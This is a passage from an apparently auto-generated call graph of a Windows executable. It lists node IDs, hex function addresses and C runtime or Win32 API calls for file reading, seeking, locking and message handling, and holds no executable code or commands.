calls 87110->87113 87117 452aa3 87112->87117 87115 452a25 87113->87115 87114 452a9d 87116 413748 _free 46 API calls 87114->87116 87115->87002 87116->87117 87117->87002 87119 431e64 87118->87119 87120 431e6a 87118->87120 87121 414a46 __fcloseall 82 API calls 87119->87121 87120->87003 87121->87120 87123 425de2 87122->87123 87124 40f6fc _wcslen 87122->87124 87123->87064 87125 40f710 WideCharToMultiByte 87124->87125 87126 40f756 87125->87126 87127 40f728 87125->87127 87126->87064 87128 4115d7 52 API calls 87127->87128 87129 40f735 WideCharToMultiByte 87128->87129 87129->87064 87132 40f85d setSBUpLow _strlen 87130->87132 87131 426b3b 87132->87131 87134 40f7ab 87132->87134 87179 414db8 87132->87179 87135 4149c2 87134->87135 87194 414904 87135->87194 87137 40f7e9 87137->87069 87138 40f5c0 87137->87138 87142 40f5cd _strcat __write_nolock _memmove 87138->87142 87139 414d04 __fread_nolock 61 API calls 87139->87142 87140 40f691 __tzset_nolock 87140->87071 87142->87139 87142->87140 87146 425d11 87142->87146 87282 4150d1 87142->87282 87143 4150d1 _fseek 81 API calls 87144 425d33 87143->87144 87145 414d04 __fread_nolock 61 API calls 87144->87145 87145->87140 87146->87143 87148 414a52 __tsopen_nolock 87147->87148 87149 414a64 87148->87149 87150 414a79 87148->87150 87422 417f77 46 API calls __getptd_noexit 87149->87422 87152 415471 __lock_file 47 API calls 87150->87152 87157 414a74 __tsopen_nolock 87150->87157 87155 414a92 87152->87155 87153 414a69 87423 417f25 10 API calls _sprintf 87153->87423 87406 4149d9 87155->87406 87157->87076 87491 414c76 87160->87491 87162 414d1c 87163 44afef 87162->87163 87659 442c5a 87163->87659 87165 44b00d 87165->87078 87167 414fee __tsopen_nolock 87166->87167 87168 414ffa 87167->87168 87169 41500f 87167->87169 87663 417f77 46 API calls __getptd_noexit 87168->87663 87170 415471 __lock_file 47 API calls 87169->87170 87172 415017 87170->87172 87174 414e4e __ftell_nolock 51 API calls 87172->87174 87173 414fff 87664 417f25 10 API calls _sprintf 87173->87664 87176 415024 87174->87176 87665 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 87176->87665 87178 41500a __tsopen_nolock 87178->87080 87180 414dd6 87179->87180 87181 414deb 87179->87181 87190 417f77 46 API calls __getptd_noexit 87180->87190 87181->87180 87183 414df2 87181->87183 87192 41b91b 79 API calls 11 library calls 87183->87192 87184 414ddb 87191 417f25 10 API calls _sprintf 87184->87191 87187 414e18 87188 414de6 87187->87188 87193 418f98 77 API calls 6 library calls 87187->87193 87188->87132 87190->87184 87191->87188 87192->87187 87193->87188 87195 414910 __tsopen_nolock 87194->87195 87196 414923 87195->87196 87199 414951 87195->87199 87250 417f77 46 API calls __getptd_noexit 87196->87250 87198 414928 87251 417f25 10 API calls _sprintf 87198->87251 87213 41d4d1 87199->87213 87202 414956 87203 41496a 87202->87203 87204 41495d 87202->87204 87206 414992 87203->87206 87207 414972 87203->87207 87252 417f77 46 API calls __getptd_noexit 87204->87252 87230 41d218 87206->87230 87253 417f77 46 API calls __getptd_noexit 87207->87253 87208 414933 __tsopen_nolock @_EH4_CallFilterFunc@8 87208->87137 87214 41d4dd __tsopen_nolock 87213->87214 87215 4182cb __lock 46 API calls 87214->87215 87221 41d4eb 87215->87221 87216 41d567 87218 416b04 __malloc_crt 46 API calls 87216->87218 87220 41d56e 87218->87220 87219 41d5f0 __tsopen_nolock 87219->87202 87222 41d57c InitializeCriticalSectionAndSpinCount 87220->87222 87228 41d560 87220->87228 87221->87216 87223 418209 __mtinitlocknum 46 API calls 87221->87223 87221->87228 87258 4154b2 47 API calls __lock 87221->87258 87259 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87221->87259 87225 41d59c 87222->87225 87226 41d5af EnterCriticalSection 87222->87226 87223->87221 87227 413748 _free 46 API calls 87225->87227 87226->87228 87227->87228 87255 41d5fb 87228->87255 87232 41d23a 87230->87232 87231 41d26c __wopenfile 87237 41d47a 87231->87237 87249 41d421 87231->87249 87266 41341f 58 API calls 2 library calls 87231->87266 87232->87231 87233 41d255 87232->87233 87264 417f77 46 API calls __getptd_noexit 87233->87264 87235 41d25a 87265 417f25 10 API calls _sprintf 87235->87265 87269 417f77 46 API calls __getptd_noexit 87237->87269 87238 41d48c 87261 422bf9 87238->87261 87241 41499d 87254 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 87241->87254 87242 41d47f 87270 417f25 10 API calls _sprintf 87242->87270 87245 41d41a 87245->87249 87267 41341f 58 API calls 2 library calls 87245->87267 87247 41d439 87247->87249 87268 41341f 58 API calls 2 library calls 87247->87268 87249->87237 87249->87238 87250->87198 87251->87208 87252->87208 87253->87208 87254->87208 87260 4181f2 LeaveCriticalSection 87255->87260 87257 41d602 87257->87219 87258->87221 87259->87221 87260->87257 87271 422b35 87261->87271 87263 422c14 87263->87241 87264->87235 87265->87241 87266->87245 87267->87247 87268->87249 87269->87242 87270->87241 87274 422b41 __tsopen_nolock 87271->87274 87272 422b54 87273 417f77 _sprintf 46 API calls 87272->87273 87275 422b59 87273->87275 87274->87272 87276 422b8a 87274->87276 87277 417f25 _sprintf 10 API calls 87275->87277 87278 422400 __tsopen_nolock 109 API calls 87276->87278 87281 422b63 __tsopen_nolock 87277->87281 87279 422ba4 87278->87279 87280 422bcb __wsopen_helper LeaveCriticalSection 87279->87280 87280->87281 87281->87263 87285 4150dd __tsopen_nolock 87282->87285 87283 4150e9 87313 417f77 46 API calls __getptd_noexit 87283->87313 87285->87283 87286 41510f 87285->87286 87295 415471 87286->87295 87287 4150ee 87314 417f25 10 API calls _sprintf 87287->87314 87294 4150f9 __tsopen_nolock 87294->87142 87296 415483 87295->87296 87297 4154a5 EnterCriticalSection 87295->87297 87296->87297 87298 41548b 87296->87298 87299 415117 87297->87299 87300 4182cb __lock 46 API calls 87298->87300 87301 415047 87299->87301 87300->87299 87302 415067 87301->87302 87303 415057 87301->87303 87308 415079 87302->87308 87316 414e4e 87302->87316 87371 417f77 46 API calls __getptd_noexit 87303->87371 87307 41505c 87315 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 87307->87315 87333 41443c 87308->87333 87311 4150b9 87346 41e1f4 87311->87346 87313->87287 87314->87294 87315->87294 87317 414e61 87316->87317 87318 414e79 87316->87318 87372 417f77 46 API calls __getptd_noexit 87317->87372 87319 414139 __flswbuf 46 API calls 87318->87319 87321 414e80 87319->87321 87324 41e1f4 __write 51 API calls 87321->87324 87322 414e66 87373 417f25 10 API calls _sprintf 87322->87373 87325 414e97 87324->87325 87326 414f09 87325->87326 87328 414ec9 87325->87328 87332 414e71 87325->87332 87374 417f77 46 API calls __getptd_noexit 87326->87374 87329 41e1f4 __write 51 API calls 87328->87329 87328->87332 87330 414f64 87329->87330 87331 41e1f4 __write 51 API calls 87330->87331 87330->87332 87331->87332 87332->87308 87334 414455 87333->87334 87335 414477 87333->87335 87334->87335 87336 414139 __flswbuf 46 API calls 87334->87336 87339 414139 87335->87339 87337 414470 87336->87337 87375 41b7b2 77 API calls 5 library calls 87337->87375 87340 414145 87339->87340 87341 41415a 87339->87341 87376 417f77 46 API calls __getptd_noexit 87340->87376 87341->87311 87343 41414a 87377 417f25 10 API calls _sprintf 87343->87377 87345 414155 87345->87311 87347 41e200 __tsopen_nolock 87346->87347 87348 41e223 87347->87348 87349 41e208 87347->87349 87351 41e22f 87348->87351 87354 41e269 87348->87354 87398 417f8a 46 API calls __getptd_noexit 87349->87398 87400 417f8a 46 API calls __getptd_noexit 87351->87400 87352 41e20d 87399 417f77 46 API calls __getptd_noexit 87352->87399 87378 41ae56 87354->87378 87356 41e234 87401 417f77 46 API calls __getptd_noexit 87356->87401 87359 41e23c 87402 417f25 10 API calls _sprintf 87359->87402 87360 41e26f 87362 41e291 87360->87362 87363 41e27d 87360->87363 87403 417f77 46 API calls __getptd_noexit 87362->87403 87388 41e17f 87363->87388 87364 41e215 __tsopen_nolock 87364->87307 87367 41e289 87405 41e2c0 LeaveCriticalSection __unlock_fhandle 87367->87405 87368 41e296 87404 417f8a 46 API calls __getptd_noexit 87368->87404 87371->87307 87372->87322 87373->87332 87374->87332 87375->87335 87376->87343 87377->87345 87379 41ae62 __tsopen_nolock 87378->87379 87380 41aebc 87379->87380 87381 4182cb __lock 46 API calls 87379->87381 87382 41aec1 EnterCriticalSection 87380->87382 87383 41aede __tsopen_nolock 87380->87383 87384 41ae8e 87381->87384 87382->87383 87383->87360 87385 41aeaa 87384->87385 87386 41ae97 InitializeCriticalSectionAndSpinCount 87384->87386 87387 41aeec ___lock_fhandle LeaveCriticalSection 87385->87387 87386->87385 87387->87380 87389 41aded __commit 46 API calls 87388->87389 87390 41e18e 87389->87390 87391 41e1a4 SetFilePointer 87390->87391 87392 41e194 87390->87392 87393 41e1c3 87391->87393 87394 41e1bb GetLastError 87391->87394 87395 417f77 _sprintf 46 API calls 87392->87395 87396 417f9d __dosmaperr 46 API calls 87393->87396 87397 41e199 87393->87397 87394->87393 87395->87397 87396->87397 87397->87367 87398->87352 87399->87364 87400->87356 87401->87359 87402->87364 87403->87368 87404->87367 87405->87364 87407 4149ea 87406->87407 87408 4149fe 87406->87408 87452 417f77 46 API calls __getptd_noexit 87407->87452 87410 4149fa 87408->87410 87411 41443c __flush 77 API calls 87408->87411 87424 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 87410->87424 87413 414a0a 87411->87413 87412 4149ef 87453 417f25 10 API calls _sprintf 87412->87453 87425 41d8c2 87413->87425 87417 414139 __flswbuf 46 API calls 87418 414a18 87417->87418 87429 41d7fe 87418->87429 87420 414a1e 87420->87410 87421 413748 _free 46 API calls 87420->87421 87421->87410 87422->87153 87423->87157 87424->87157 87426 414a12 87425->87426 87427 41d8d2 87425->87427 87426->87417 87427->87426 87428 413748 _free 46 API calls 87427->87428 87428->87426 87430 41d80a __tsopen_nolock 87429->87430 87431 41d812 87430->87431 87432 41d82d 87430->87432 87469 417f8a 46 API calls __getptd_noexit 87431->87469 87434 41d839 87432->87434 87437 41d873 87432->87437 87471 417f8a 46 API calls __getptd_noexit 87434->87471 87435 41d817 87470 417f77 46 API calls __getptd_noexit 87435->87470 87441 41ae56 ___lock_fhandle 48 API calls 87437->87441 87439 41d83e 87472 417f77 46 API calls __getptd_noexit 87439->87472 87443 41d879 87441->87443 87442 41d846 87473 417f25 10 API calls _sprintf 87442->87473 87445 41d893 87443->87445 87446 41d887 87443->87446 87474 417f77 46 API calls __getptd_noexit 87445->87474 87454 41d762 87446->87454 87449 41d88d 87475 41d8ba LeaveCriticalSection __unlock_fhandle 87449->87475 87451 41d81f __tsopen_nolock 87451->87420 87452->87412 87453->87410 87476 41aded 87454->87476 87456 41d7c8 87489 41ad67 47 API calls 2 library calls 87456->87489 87458 41d772 87458->87456 87461 41aded __commit 46 API calls 87458->87461 87467 41d7a6 87458->87467 87459 41aded __commit 46 API calls 87463 41d7b2 CloseHandle 87459->87463 87460 41d7d0 87468 41d7f2 87460->87468 87490 417f9d 46 API calls 3 library calls 87460->87490 87462 41d79d 87461->87462 87464 41aded __commit 46 API calls 87462->87464 87463->87456 87465 41d7be GetLastError 87463->87465 87464->87467 87465->87456 87467->87456 87467->87459 87468->87449 87469->87435 87470->87451 87471->87439 87472->87442 87473->87451 87474->87449 87475->87451 87477 41ae12 87476->87477 87478 41adfa 87476->87478 87480 417f8a __tsopen_nolock 46 API calls 87477->87480 87483 41ae51 87477->87483 87479 417f8a __tsopen_nolock 46 API calls 87478->87479 87481 41adff 87479->87481 87482 41ae23 87480->87482 87484 417f77 _sprintf 46 API calls 87481->87484 87485 417f77 _sprintf 46 API calls 87482->87485 87483->87458 87488 41ae07 87484->87488 87486 41ae2b 87485->87486 87487 417f25 _sprintf 10 API calls 87486->87487 87487->87488 87488->87458 87489->87460 87490->87468 87492 414c82 __tsopen_nolock 87491->87492 87493 414cc3 87492->87493 87494 414c96 setSBUpLow 87492->87494 87496 414cbb __tsopen_nolock 87492->87496 87495 415471 __lock_file 47 API calls 87493->87495 87518 417f77 46 API calls __getptd_noexit 87494->87518 87497 414ccb 87495->87497 87496->87162 87504 414aba 87497->87504 87500 414cb0 87519 417f25 10 API calls _sprintf 87500->87519 87505 414ad8 setSBUpLow 87504->87505 87510 414af2 87504->87510 87506 414ae2 87505->87506 87505->87510 87515 414b2d 87505->87515 87571 417f77 46 API calls __getptd_noexit 87506->87571 87508 414ae7 87572 417f25 10 API calls _sprintf 87508->87572 87520 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 87510->87520 87512 414c38 setSBUpLow 87574 417f77 46 API calls __getptd_noexit 87512->87574 87513 414139 __flswbuf 46 API calls 87513->87515 87515->87510 87515->87512 87515->87513 87521 41dfcc 87515->87521 87551 41d8f3 87515->87551 87573 41e0c2 46 API calls 3 library calls 87515->87573 87518->87500 87519->87496 87520->87496 87522 41dfd8 __tsopen_nolock 87521->87522 87523 41dfe0 87522->87523 87524 41dffb 87522->87524 87644 417f8a 46 API calls __getptd_noexit 87523->87644 87526 41e007 87524->87526 87529 41e041 87524->87529 87646 417f8a 46 API calls __getptd_noexit 87526->87646 87527 41dfe5 87645 417f77 46 API calls __getptd_noexit 87527->87645 87532 41e063 87529->87532 87533 41e04e 87529->87533 87531 41e00c 87647 417f77 46 API calls __getptd_noexit 87531->87647 87536 41ae56 ___lock_fhandle 48 API calls 87532->87536 87649 417f8a 46 API calls __getptd_noexit 87533->87649 87538 41e069 87536->87538 87537 41e053 87650 417f77 46 API calls __getptd_noexit 87537->87650 87541 41e077 87538->87541 87542 41e08b 87538->87542 87575 41da15 87541->87575 87651 417f77 46 API calls __getptd_noexit 87542->87651 87544 41e014 87648 417f25 10 API calls _sprintf 87544->87648 87546 41e090 87652 417f8a 46 API calls __getptd_noexit 87546->87652 87547 41e083 87653 41e0ba LeaveCriticalSection __unlock_fhandle 87547->87653 87550 41dfed __tsopen_nolock 87550->87515 87552 41d900 87551->87552 87556 41d915 87551->87556 87657 417f77 46 API calls __getptd_noexit 87552->87657 87554 41d905 87658 417f25 10 API calls _sprintf 87554->87658 87557 41d94a 87556->87557 87562 41d910 87556->87562 87654 420603 87556->87654 87559 414139 __flswbuf 46 API calls 87557->87559 87560 41d95e 87559->87560 87561 41dfcc __read 59 API calls 87560->87561 87563 41d965 87561->87563 87562->87515 87563->87562 87564 414139 __flswbuf 46 API calls 87563->87564 87565 41d988 87564->87565 87565->87562 87566 414139 __flswbuf 46 API calls 87565->87566 87567 41d994 87566->87567 87567->87562 87568 414139 __flswbuf 46 API calls 87567->87568 87569 41d9a1 87568->87569 87570 414139 __flswbuf 46 API calls 87569->87570 87570->87562 87571->87508 87572->87510 87573->87515 87574->87508 87576 41da31 87575->87576 87577 41da4c 87575->87577 87579 417f8a __tsopen_nolock 46 API calls 87576->87579 87578 41da5b 87577->87578 87580 41da7a 87577->87580 87581 417f8a __tsopen_nolock 46 API calls 87578->87581 87582 41da36 87579->87582 87584 41da98 87580->87584 87595 41daac 87580->87595 87583 41da60 87581->87583 87585 417f77 _sprintf 46 API calls 87582->87585 87587 417f77 _sprintf 46 API calls 87583->87587 87588 417f8a __tsopen_nolock 46 API calls 87584->87588 87596 41da3e 87585->87596 87586 41db02 87590 417f8a __tsopen_nolock 46 API calls 87586->87590 87589 41da67 87587->87589 87591 41da9d 87588->87591 87592 417f25 _sprintf 10 API calls 87589->87592 87593 41db07 87590->87593 87594 417f77 _sprintf 46 API calls 87591->87594 87592->87596 87597 417f77 _sprintf 46 API calls 87593->87597 87598 41daa4 87594->87598 87595->87586 87595->87596 87599 41dae1 87595->87599 87601 41db1b 87595->87601 87596->87547 87597->87598 87600 417f25 _sprintf 10 API calls 87598->87600 87599->87586 87604 41daec ReadFile 87599->87604 87600->87596 87603 416b04 __malloc_crt 46 API calls 87601->87603 87605 41db31 87603->87605 87606 41dc17 87604->87606 87607 41df8f GetLastError 87604->87607 87610 41db59 87605->87610 87611 41db3b 87605->87611 87606->87607 87614 41dc2b 87606->87614 87608 41de16 87607->87608 87609 41df9c 87607->87609 87618 417f9d __dosmaperr 46 API calls 87608->87618 87623 41dd9b 87608->87623 87612 417f77 _sprintf 46 API calls 87609->87612 87615 420494 __lseeki64_nolock 48 API calls 87610->87615 87613 417f77 _sprintf 46 API calls 87611->87613 87616 41dfa1 87612->87616 87617 41db40 87613->87617 87614->87623 87624 41dc47 87614->87624 87627 41de5b 87614->87627 87619 41db67 87615->87619 87620 417f8a __tsopen_nolock 46 API calls 87616->87620 87621 417f8a __tsopen_nolock 46 API calls 87617->87621 87618->87623 87619->87604 87620->87623 87621->87596 87622 413748 _free 46 API calls 87622->87596 87623->87596 87623->87622 87625 41dcab ReadFile 87624->87625 87632 41dd28 87624->87632 87630 41dcc9 GetLastError 87625->87630 87635 41dcd3 87625->87635 87626 41ded0 ReadFile 87628 41deef GetLastError 87626->87628 87636 41def9 87626->87636 87627->87623 87627->87626 87628->87627 87628->87636 87629 41ddec MultiByteToWideChar 87629->87623 87631 41de10 GetLastError 87629->87631 87630->87624 87630->87635 87631->87608 87632->87623 87633 41dda3 87632->87633 87634 41dd96 87632->87634 87640 41dd60 87632->87640 87633->87640 87641 41ddda 87633->87641 87637 417f77 _sprintf 46 API calls 87634->87637 87635->87624 87638 420494 __lseeki64_nolock 48 API calls 87635->87638 87636->87627 87639 420494 __lseeki64_nolock 48 API calls 87636->87639 87637->87623 87638->87635 87639->87636 87640->87629 87642 420494 __lseeki64_nolock 48 API calls 87641->87642 87643 41dde9 87642->87643 87643->87629 87644->87527 87645->87550 87646->87531 87647->87544 87648->87550 87649->87537 87650->87544 87651->87546 87652->87547 87653->87550 87655 416b04 __malloc_crt 46 API calls 87654->87655 87656 420618 87655->87656 87656->87557 87657->87554 87658->87562 87662 4148b3 GetSystemTimeAsFileTime __aulldiv 87659->87662 87661 442c6b 87661->87165 87662->87661 87663->87173 87664->87178 87665->87178 87671 45272f __tzset_nolock _wcscpy 87666->87671 87667 414d04 61 API calls __fread_nolock 87667->87671 87668 44afef GetSystemTimeAsFileTime 87668->87671 87669 4528a4 87669->87086 87669->87087 87670 4150d1 81 API calls _fseek 87670->87671 87671->87667 87671->87668 87671->87669 87671->87670 87673 44b1bc 87672->87673 87674 44b1ca 87672->87674 87675 4149c2 116 API calls 87673->87675 87676 44b1e1 87674->87676 87677 44b1d8 87674->87677 87678 4149c2 116 API calls 87674->87678 87675->87674 87707 4321a4 87676->87707 87677->87114 87680 44b2db 87678->87680 87680->87676 87682 44b2e9 87680->87682 87681 44b224 87683 44b253 87681->87683 87684 44b228 87681->87684 87685 44b2f6 87682->87685 87687 414a46 __fcloseall 82 API calls 87682->87687 87711 43213d 87683->87711 87689 414a46 __fcloseall 82 API calls 87684->87689 87691 44b235 87684->87691 87685->87114 87687->87685 87688 44b25a 87690 44b289 87688->87690 87693 44b260 87688->87693 87689->87691 87721 44b0bf 87 API calls 87690->87721 87692 414a46 __fcloseall 82 API calls 87691->87692 87696 44b245 87691->87696 87692->87696 87694 44b26d 87693->87694 87697 414a46 __fcloseall 82 API calls 87693->87697 87698 44b27d 87694->87698 87700 414a46 __fcloseall 82 API calls 87694->87700 87696->87114 87697->87694 87698->87114 87699 44b28f 87722 4320f8 46 API calls _free 87699->87722 87700->87698 87702 44b295 87703 44b2a2 87702->87703 87704 414a46 __fcloseall 82 API calls 87702->87704 87705 44b2b2 87703->87705 87706 414a46 __fcloseall 82 API calls 87703->87706 87704->87703 87705->87114 87706->87705 87708 4321b4 __tzset_nolock _memmove 87707->87708 87709 4321cb 87707->87709 87708->87681 87710 414d04 __fread_nolock 61 API calls 87709->87710 87710->87708 87712 4135bb _malloc 46 API calls 87711->87712 87713 432150 87712->87713 87714 4135bb _malloc 46 API calls 87713->87714 87715 432162 87714->87715 87716 4135bb _malloc 46 API calls 87715->87716 87717 432174 87716->87717 87720 432189 87717->87720 87723 4320f8 46 API calls _free 87717->87723 87719 432198 87719->87688 87720->87688 87721->87699 87722->87702 87723->87719 87724->87017 87725->87019 87726->87036 87727->87036 87728->87036 87729->87031 87730->87036 87731->87036 87732->87042 87733->87051 87734->87049 87735->87049 87785 410160 87736->87785 87738 41012f GetFullPathNameW 87739 410147 moneypunct 87738->87739 87739->86872 87741 4102cb SHGetDesktopFolder 87740->87741 87744 410333 _wcsncpy 87740->87744 87742 4102e0 _wcsncpy 87741->87742 87741->87744 87743 41031c SHGetPathFromIDListW 87742->87743 87742->87744 87743->87744 87744->86875 87746 4101bb 87745->87746 87750 425f4a 87745->87750 87747 410160 52 API calls 87746->87747 87749 4101c7 87747->87749 87748 4114ab __wcsicoll 58 API calls 87748->87750 87789 410200 52 API calls 2 library calls 87749->87789 87750->87748 87752 425f6e 87750->87752 87752->86877 87753 4101d6 87790 410200 52 API calls 2 library calls 87753->87790 87755 4101e9 87755->86877 87757 40f760 128 API calls 87756->87757 87758 40f584 87757->87758 87759 429335 87758->87759 87760 40f58c 87758->87760 87763 4528bd 118 API calls 87759->87763 87761 40f598 87760->87761 87762 429358 87760->87762 87815 4033c0 113 API calls 7 library calls 87761->87815 87816 434034 86 API calls _wprintf 87762->87816 87765 42934b 87763->87765 87768 429373 87765->87768 87769 42934f 87765->87769 87767 40f5b4 87767->86873 87771 4115d7 52 API calls 87768->87771 87772 431e58 82 API calls 87769->87772 87770 429369 87770->87768 87784 4293c5 moneypunct 87771->87784 87772->87762 87773 42959c 87774 413748 _free 46 API calls 87773->87774 87775 4295a5 87774->87775 87776 431e58 82 API calls 87775->87776 87777 4295b1 87776->87777 87781 401b10 52 API calls 87781->87784 87784->87773 87784->87781 87791 444af8 87784->87791 87794 44b41c 87784->87794 87801 402780 87784->87801 87809 4022d0 87784->87809 87817 44c7dd 64 API calls 3 library calls 87784->87817 87786 410167 _wcslen 87785->87786 87787 4115d7 52 API calls 87786->87787 87788 41017e _wcscpy 87787->87788 87788->87738 87789->87753 87790->87755 87792 4115d7 52 API calls 87791->87792 87793 444b27 _memmove 87792->87793 87793->87784 87795 44b429 87794->87795 87796 4115d7 52 API calls 87795->87796 87797 44b440 87796->87797 87798 44b45e 87797->87798 87799 401b10 52 API calls 87797->87799 87798->87784 87800 44b453 87799->87800 87800->87784 87802 402827 87801->87802 87805 402790 moneypunct _memmove 87801->87805 87804 4115d7 52 API calls 87802->87804 87803 4115d7 52 API calls 87806 402797 87803->87806 87804->87805 87805->87803 87807 4027bd 87806->87807 87808 4115d7 52 API calls 87806->87808 87807->87784 87808->87807 87810 4022e0 87809->87810 87813 40239d 87809->87813 87811 4115d7 52 API calls 87810->87811 87810->87813 87814 402320 moneypunct 87810->87814 87811->87814 87812 4115d7 52 API calls 87812->87814 87813->87784 87814->87812 87814->87813 87815->87767 87816->87770 87817->87784 87819 402539 moneypunct 87818->87819 87820 402417 87818->87820 87819->86881 87820->87819 87821 4115d7 52 API calls 87820->87821 87822 402443 87821->87822 87823 4115d7 52 API calls 87822->87823 87824 4024b4 87823->87824 87824->87819 87826 4022d0 52 API calls 87824->87826 87847 402880 95 API calls 2 library calls 87824->87847 87826->87824 87832 401566 87827->87832 87828 401794 87848 40e9a0 90 API calls 87828->87848 87831 4010a0 52 API calls 87831->87832 87832->87828 87832->87831 87833 40167a 87832->87833 87834 4017c0 87833->87834 87849 45e737 90 API calls 3 library calls 87833->87849 87834->86883 87836 40bc70 52 API calls 87835->87836 87845 40d451 87836->87845 87837 40d50f 87852 410600 52 API calls 87837->87852 87839 427c01 87853 45e737 90 API calls 3 library calls 87839->87853 87840 40e0a0 52 API calls 87840->87845 87842 401b10 52 API calls 87842->87845 87843 40d519 87843->86886 87845->87837 87845->87839 87845->87840 87845->87842 87845->87843 87850 40f310 53 API calls 87845->87850 87851 40d860 91 API calls 87845->87851 87847->87824 87848->87833 87849->87834 87850->87845 87851->87845 87852->87843 87853->87843 87854->86899 87855->86900 87857 42c5fe 87856->87857 87872 4091c6 87856->87872 87858 40bc70 52 API calls 87857->87858 87857->87872 87859 42c64e InterlockedIncrement 87858->87859 87860 42c665 87859->87860 87866 42c697 87859->87866 87863 42c672 InterlockedDecrement Sleep InterlockedIncrement 87860->87863 87860->87866 87861 42c737 InterlockedDecrement 87862 42c74a 87861->87862 87865 408f40 VariantClear 87862->87865 87863->87860 87863->87866 87864 42c731 87864->87861 87868 42c752 87865->87868 87866->87861 87866->87864 88149 408e80 87866->88149 88162 410c60 87868->88162 87872->86960 87873 42c6db 87874 402160 52 API calls 87873->87874 87875 42c6e5 87874->87875 87876 45340c 85 API calls 87875->87876 87877 42c6f1 87876->87877 88159 40d200 52 API calls 2 library calls 87877->88159 87879 42c6fb 88160 465124 53 API calls 87879->88160 87881 42c715 87882 42c76a 87881->87882 87883 42c719 87881->87883 87884 401b10 52 API calls 87882->87884 88161 46fe32 VariantClear 87883->88161 87886 42c77e 87884->87886 87887 401980 53 API calls 87886->87887 87888 42c796 87887->87888 87889 42c812 87888->87889 87893 42c864 87888->87893 88167 40ba10 87888->88167 88173 46fe32 VariantClear 87889->88173 87891 42c82a InterlockedDecrement 88174 46ff07 54 API calls 87891->88174 88175 45e737 90 API calls 3 library calls 87893->88175 87894 42c9ec 87900 401980 53 API calls 87910 42c849 87900->87910 87901 408f40 VariantClear 87901->87910 87903 402780 52 API calls 87903->87910 87905 408f40 VariantClear 87907 42c891 87905->87907 87909 410c60 VariantClear 87907->87909 87909->87872 87910->87894 87910->87900 87910->87901 87910->87903 88176 40a780 87910->88176 87911 42c874 87911->87905 87913 42ca59 87911->87913 87913->87913 87915 40afc4 87914->87915 87916 40b156 87914->87916 87917 40afd5 87915->87917 87918 42d1e3 87915->87918 88232 45e737 90 API calls 3 library calls 87916->88232 87921 40a780 199 API calls 87917->87921 87939 40b11a moneypunct 87917->87939 88233 45e737 90 API calls 3 library calls 87918->88233 87925 40b00a 87921->87925 87922 40b143 87922->86960 87923 42d1f8 87927 408f40 VariantClear 87923->87927 87925->87923 87928 40b012 87925->87928 87926 42d4db 87926->87926 87927->87922 87929 40b04a 87928->87929 87930 42d231 VariantClear 87928->87930 87931 40b094 moneypunct 87928->87931 87937 40b05c moneypunct 87929->87937 88234 40e270 VariantClear moneypunct 87929->88234 87930->87937 87932 40b108 87931->87932 87935 42d425 moneypunct 87931->87935 87932->87939 88235 40e270 VariantClear moneypunct 87932->88235 87933 42d45a VariantClear 87933->87939 87935->87933 87935->87939 87937->87931 87938 4115d7 52 API calls 87937->87938 87938->87931 87939->87922 88236 45e737 90 API calls 3 library calls 87939->88236 87941 408fff 87940->87941 87952 40900d 87940->87952 88283 403ea0 52 API calls __cinit 87941->88283 87944 42c3f6 88286 45e737 90 API calls 3 library calls 87944->88286 87946 42c44a 88288 45e737 90 API calls 3 library calls 87946->88288 87947 40a780 199 API calls 87947->87952 87948 42c47b 88289 451b42 61 API calls 87948->88289 87952->87944 87952->87946 87952->87947 87952->87948 87953 42c4cb 87952->87953 87954 42c564 87952->87954 87958 42c548 87952->87958 87960 409112 87952->87960 87962 42c528 87952->87962 87964 4090df 87952->87964 87965 4090ea 87952->87965 87974 4090f2 moneypunct 87952->87974 88285 4534e3 52 API calls 87952->88285 88287 40c4e0 199 API calls 87952->88287 88237 47faae 87953->88237 87955 408f40 VariantClear 87954->87955 87955->87974 87956 42c491 87956->87974 88290 45e737 90 API calls 3 library calls 87956->88290 88293 45e737 90 API calls 3 library calls 87958->88293 87959 42c4da 87959->87974 88291 45e737 90 API calls 3 library calls 87959->88291 87960->87958 87968 40912b 87960->87968 88292 45e737 90 API calls 3 library calls 87962->88292 87964->87965 87966 408e80 VariantClear 87964->87966 87970 408f40 VariantClear 87965->87970 87966->87965 87968->87974 88284 403e10 53 API calls 87968->88284 87970->87974 87972 40914b 87973 408f40 VariantClear 87972->87973 87973->87974 87974->86960 88480 408d90 87975->88480 87977 429778 87978 410c60 VariantClear 87977->87978 87979 429780 87978->87979 87980 408cf9 87980->87977 87981 42976c 87980->87981 87983 408d2d 87980->87983 88505 45e737 90 API calls 3 library calls 87981->88505 88496 403d10 87983->88496 87986 408d71 moneypunct 87986->86960 87987 408f40 VariantClear 87988 408d45 moneypunct 87987->87988 87988->87986 87988->87987 87990 425c87 87989->87990 87991 40d15f 87989->87991 87992 425cc7 87990->87992 87993 425ca1 TranslateAcceleratorW 87990->87993 87991->86960 87993->87991 87995 42602f 87994->87995 87998 40d17f 87994->87998 87995->86960 87996 42608e IsDialogMessageW 87997 40d18c 87996->87997 87996->87998 87997->86960 87998->87996 87998->87997 88719 430c46 GetClassLongW 87998->88719 88001 4096c6 _wcslen 88000->88001 88002 4115d7 52 API calls 88001->88002 88063 40a70c moneypunct _memmove 88001->88063 88003 4096fa _memmove 88002->88003 88005 4115d7 52 API calls 88003->88005 88004 4013a0 52 API calls 88006 4297aa 88004->88006 88007 40971b 88005->88007 88008 4115d7 52 API calls 88006->88008 88009 409749 CharUpperBuffW 88007->88009 88011 40976a moneypunct 88007->88011 88007->88063 88051 4297d1 _memmove 88008->88051 88009->88011 88059 4097e5 moneypunct 88011->88059 88721 47dcbb 201 API calls 88011->88721 88013 408f40 VariantClear 88014 42ae92 88013->88014 88015 410c60 VariantClear 88014->88015 88016 42aea4 88015->88016 88017 409aa2 88020 4115d7 52 API calls 88017->88020 88024 409afe 88017->88024 88017->88051 88018 40a689 88021 4115d7 52 API calls 88018->88021 88019 4115d7 52 API calls 88019->88059 88020->88024 88037 40a6af moneypunct _memmove 88021->88037 88022 409b2a 88026 429dbe 88022->88026 88074 409b4d moneypunct _memmove 88022->88074 88727 40b400 VariantClear VariantClear moneypunct 88022->88727 88023 40c2c0 52 API calls 88023->88059 88024->88022 88025 4115d7 52 API calls 88024->88025 88027 429d31 88025->88027 88030 429dd3 88026->88030 88728 40b400 VariantClear VariantClear 